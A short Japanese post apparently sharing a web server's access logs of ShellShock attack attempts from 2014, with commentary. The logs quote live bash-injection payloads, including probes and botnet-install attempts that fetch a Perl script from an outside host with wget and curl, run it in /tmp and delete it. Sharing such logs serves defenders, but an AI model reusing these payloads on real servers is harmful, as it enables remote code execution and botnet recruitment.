ShellShockの攻撃ログを晒してみるテスト。一部はIPを隠しています。
ShellShock発表のあとにスキャンされた例
209.126.230.72 - - [25/Sep/2014:10:21:03 +0900] "GET / HTTP/1.0" 200 141 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
脆弱性チェックbot
118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 403 219 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 9n4qIed2aL`;" 118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 403 218 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo TtpE69SzyV`;" 118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 403 218 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo fvOz94LqIm`;" 118.192.48.* - - [28/Sep/2014:01:08:27 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 403 219 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 0RzvleB3im`;
攻撃できるかの試行ですかね?
botnetを仕掛ける
173.45.100.** - - [29/Sep/2014:10:18:18 +0900] "GET /cgi-bin/ HTTP/1.1" 403 210 "-" "-" 173.45.100.** - - [29/Sep/2014:10:18:21 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.***/ji;curl -O /tmp/ji http://213.5.67.***/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" 142.4.215.*** - - [01/Oct/2014:15:59:01 +0900] "GET /cgi-bin/ HTTP/1.1" 403 210 "-" "-" 142.4.215.*** - - [01/Oct/2014:15:59:07 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.**/ji;curl -O /tmp/ji http://89.33.193.**/ji ; perl /tmp/ji;rm -rf /tmp/ji\"